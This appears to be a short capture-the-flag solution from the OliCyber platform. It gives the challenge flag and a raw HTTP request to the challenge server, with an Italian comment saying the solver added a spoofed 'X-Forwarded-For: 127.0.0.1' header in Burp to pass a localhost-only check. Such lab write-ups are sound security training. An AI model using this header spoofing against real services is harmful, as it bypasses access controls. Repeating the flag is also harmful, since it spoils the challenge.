flag{gl1_h3ader_p0ss0no_m3ntire}

GET / HTTP/1.1
Host: nearby.challs.olicyber.it:37005
X-Forwarded-For: 127.0.0.1 #aggiungo questo sulal richiesta su burp
Cache-Control: max-age=0
Accept-Language: it-IT,it;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

